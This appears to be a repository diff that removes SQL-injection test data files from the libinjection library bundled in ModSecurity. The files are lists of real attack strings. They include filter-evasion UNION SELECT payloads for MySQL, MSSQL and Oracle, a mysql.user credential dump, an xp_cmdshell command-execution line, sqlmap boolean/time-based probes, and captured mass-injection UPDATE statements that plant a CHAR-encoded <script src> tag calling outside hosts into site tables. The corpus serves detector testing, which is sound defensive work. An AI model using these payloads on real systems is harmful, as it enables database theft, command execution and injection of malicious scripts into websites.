!true,0x00),CHAR((ceil(pi())+!false)*ceil((pi()+ceil(pi()))*pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--cos(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--ceil(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))-cos(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--floor(pi()*pi()),(ceil(pi()*pi())*ceil(pi()*pi()))-floor(pi()))),0x6d7973716c))from(select--(select~0x7))0o0oOOO0Oo0OOooOooOoO00Oooo0o0oO)from(select@/*!/*!$*/from(select+3.``)000oOOO0Oo0OOooOooOoO00Oooo0o0oO)0o0oOOO0Oo0OOooOooOoO00Oooo0o0oO/*!76799sElect@000OO0O0OooOoO00Oooo0OoOooo0o0o:=group_concat(`user`)``from`mysql.user`WHeRe(user)=0x726f6f74*/#(SeLECT@ uNioN sElEcT AlL group_concat(cOLumN_nAME,1,1)FroM InFoRMaTioN_ScHemA.COLUMNS where taBle_scHema not in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c)UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO UNION SELECT@000OO0O0OooOoO0OOoooO0oOooo0o0oOO UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO)
#
# Slide 74 (MySQL Obfuscation)
#
1.UNION SELECT 2
3.2UNION SELECT 2
1e0UNION SELECT 2
SELECT\N/0.e3UNION SELECT 2
1e1AND-0.0UNION SELECT 2
1/*!12345UNION/*!31337SELECT/*!table_name*/
{ts 1}UNION SELECT.`` 1.e.table_name
SELECT $.`` 1.e.table_name
SELECT{_ .``1.e.table_name}
SELECT LightOS . ``1.e.table_name LightOS)
SELECT information_schema 1337.e.tables 13.37e.table_name
SELECT 1 from information_schema 9.e.table_name
#
# Slide 75 (MSSQL Obfuscation)
#
.1UNION SELECT 2
1.UNION SELECT.2alias
1e0UNION SELECT 2
1e1AND-1=0.0UNION SELECT 2
SELECT 0xUNION SELECT 2
SELECT\UNION SELECT 2
\1UNION SELECT 2
SELECT 1FROM[table]WHERE\1=\1AND\1=\1
SELECT"table_name"FROM[information_schema].[tables]
#
# Slide 76 (Oracle Obfuscation)
#
1FUNION SELECT 2
1DUNION SELECT 2
SELECT 0x7461626c655f6e616d65 FROM all_tab_tables
SELECT CHR(116) || CHR(97) || CHR(98) FROM all_tab_tables
SELECT%00table_name%00FROM%00all_tab_tables
#
# Slide 77 (Bypassing Firewalls, General Tips)
#
1 UNION SELECT GROUP_CONCAT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES
CASE WHEN BINARY TRUE THEN TRUE END IS NOT UNKNOWN HAVING TRUE FOR UPDATE
#
# Slide 78 (Modsecurity)
#
-2 div 1 union all #in%0a#between comments%0a#in%0a#between comments%0aselect 0x00, 0x41 like/*!31337table_name*/,3 from information_schema.tables limit 1
#
# Slide 79 (Modsecurity)
#
CASE WHEN BINARY TRUE THEN TRUE END IS UNKNOWN FOR UPDATE UNION SELECT MATTRESSES
#
# Slide 80 (Fortinet)
# (Skipped since specific to Fortinet)
#S%A0E%B1L%C2E%D3C%E4T%F6 1 U%FFNION SEL%FFECT 2
#
# Slide 81 (GreenSQL)
#
-1 UNION SELECT table_name FROM information_schema.tables limit 1
1 AND 1=0 UNION SELECT table_name FROM information_schema.tables limit 1
1 AND 1=0.e1 UNION SELECT table_name FROM information_schema.tables limit 1
1 AND 1= binary 1 UNION SELECT table_name FROM information_schema.tables limit 1
IF((SELECT mid(table_name,1,1) FROM information_schema.tables limit 1) =C,1,2)
#
# Slide 83 (libinjection)
#
-1 UNION SELECT table_name Websec FROM information_schema.tables LIMIT 1
-1 UNION%0ASELECT table_name FROM information_schema.tables LIMIT 1
# note changed "FROM table" to "FROM table_name"
# and "column" to "column_name"
-1fUNION SELECT column_name FROM table_name
1; DECLARE @test AS varchar(20); EXEC master.dbo.xp_cmdshell 'cmd'
-[id] UNION SELECT table_name FROM information_schema.tables LIMIT 1
{d 2} UNION SELECT table_name FROM information_schema.tables LIMIT 1
#
# Slide 84 (libinjection)
#
1 between 1 AND`id` having 0 union select table_name from information_schema.tables
1 mod /*!1*/ union select table_name from information_schema.tables--
true is not unknown for update union select table_name from information_schema.tables
test'-1/1/**/union(select table_name from information_schema.tables limit 1,1)
-1 union select @``"", table_name from information_schema.tables
-1 LOCK IN SHARE MODE UNION SELECT table_name from information_schema.tables
$.``.id and 0 union select table_name from information_schema.tables
-(select @) is unknown having 1 UNION select table_name from information_schema.tables
/*!911111*//*!0*/union select table_name x from information_schema.tables limit 1
-1.for update union select table_name from information_schema.tables limit 1
-0b01 union select table_name from information_schema.tables limit 1
1<binary 1>2 union select table_name from information_schema.tables limit 1
-1 procedure analyse(1gfsdgfds, sfg) union select table_name from information_schema.tables limit 1

24
src/deps/src/ModSecurity/others/libinjection/data/sqli-spiderlabs-201107.txt
View File

File diff suppressed because one or more lines are too long

24
src/deps/src/ModSecurity/others/libinjection/data/sqli-spiderlabs-201112.txt
View File

@ -1,24 +0,0 @@
#
# http://blog.spiderlabs.com/2011/12/honeypot-alert-sql-injection-scanning-update-filter-evasions-detected.html
#
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C3%2C4%2C5%2C0x33633273366962%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
200%2F%2A%2A%2FuNiOn%2F%2A%2A%2FALL%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2Fall%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2Fall%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C3%2C4%2C5%2C6%2C0x33633273366962%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%22%2F%2A%2A%2FuNiOn%2F%2A%2A%2FALL%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
4%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
222%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
222%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fmos_users--
35022%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--
2%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C2%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users--

12
src/deps/src/ModSecurity/others/libinjection/data/sqli-spiderlabs-201205.txt
View File

@ -1,12 +0,0 @@
#
# http://blog.spiderlabs.com/2012/05/mass-sql-injection-payload-analysis.html
#
21+update+Categories+set+Category_Title=cast(Category_Title+as+varchar(8000))%2Bcast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(103)%2Bchar(98)%2Bchar(121)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000))--
21+update+Categories+set+Category_Title=REPLACE(cast(Category_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(110)%2Bchar(106)%2Bchar(104)%2Bchar(107)%2Bchar(109)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
21+update+Categories+set+Category_Title=REPLACE(cast(Category_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(110)%2Bchar(105)%2Bchar(107)%2Bchar(106)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
21+update+Content+set+Content_Title=cast(Content_Title+as+varchar(8000))%2Bcast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(103)%2Bchar(98)%2Bchar(121)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000))--
21+update+Content+set+Content_Title=REPLACE(cast(Content_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(110)%2Bchar(106)%2Bchar(104)%2Bchar(107)%2Bchar(109)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
21+update+Content+set+Content_Title=REPLACE(cast(Content_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(110)%2Bchar(105)%2Bchar(107)%2Bchar(106)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
21+update+Homepage+set+Homepage_Title=cast(Homepage_Title+as+varchar(8000))%2Bcast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(103)%2Bchar(98)%2Bchar(121)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000))--
21+update+Homepage+set+Homepage_Title=REPLACE(cast(Homepage_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(110)%2Bchar(106)%2Bchar(104)%2Bchar(107)%2Bchar(109)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
21+update+Homepage+set+Homepage_Title=REPLACE(cast(Homepage_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(110)%2Bchar(105)%2Bchar(107)%2Bchar(106)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--

36765
src/deps/src/ModSecurity/others/libinjection/data/sqli-sqlmap-20130419.txt
View File

File diff suppressed because it is too large Load Diff

100
src/deps/src/ModSecurity/others/libinjection/data/sqli-sqlmap-20160724.txt
View File

@ -1,100 +0,0 @@
# https://github.com/client9/libinjection/issues/109
#
1 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))
1 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))# YxEq
1 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))-- TscQ
1 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))
1 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))# cDdL
1 OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))-- DIOu
1 RLIKE (SELECT * FROM (SELECT(SLEEP(5)))FsPL)
1 RLIKE (SELECT * FROM (SELECT(SLEEP(5-(IF(45=28,0,5)))))vxEi)
1 RLIKE (SELECT * FROM (SELECT(SLEEP(5-(IF(6715=6715,0,5)))))Hfle) 1 RLIKE (SELECT * FROM (SELECT(SLEEP(5-(IF(6958>6957,0,5)))))sets)
1" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND "ZBav"="ZBav
1" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND "ekgZ" LIKE "ekgZ
1" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8)))-- ikjC
1" OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND "AinJ"="AinJ
1" OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND "ULyg" LIKE "ULyg
1" OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8)))-- qLff
1") AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ("ReEg" LIKE "ReEg
1") AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ("SiLv"="SiLv
1") OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ("QwEf"="QwEf
1") OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ("acRz" LIKE "acRz
1") PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ("RJVy" LIKE "RJVy
1") PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ("rTWb"="rTWb
1")) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (("AWGS" LIKE "AWGS
1")) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (("ObjI"="ObjI
1")) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (("SgCv" LIKE "SgCv
1")) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (("vYkA"="vYkA
1")) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (("TAfM"="TAfM
1")) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (("YVzA" LIKE "YVzA
1"))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((("XwuG"="XwuG
1"))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((("tENF" LIKE "tENF
1"))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((("fLDW" LIKE "fLDW
1"))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((("lEki"="lEki
"))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((("enRJ" LIKE "enRJ
1"))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((("zhFB"="zhFB
1%" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND "%"="
1%" OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND "%"="
1%") AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ("%"="
1%") OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ("%"="
1%") PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ("%"="
1%")) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND (("%"="
1%")) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND (("%"="
1%")) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND (("%"="
1%"))) AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ((("%"="
1%"))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND ((("%"="
1%"))) PROCEDURE ANALYSE(EXTRACTVALUE(9414,CONCAT(0x5c,0x71786a7671,(SELECT (CASE WHEN (9414=9414) THEN 1 ELSE 0 END)),0x7162716b71)),1) AND ((("%"="
1%' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND '%'='
1%' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8315=8315,1))),0x7162716b71)) USING utf8))) AND '%'='
1%') AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71786a7671,(SELECT (ELT(8051=8051,1))),0x7162716b71)) USING utf8))) AND ('%'='
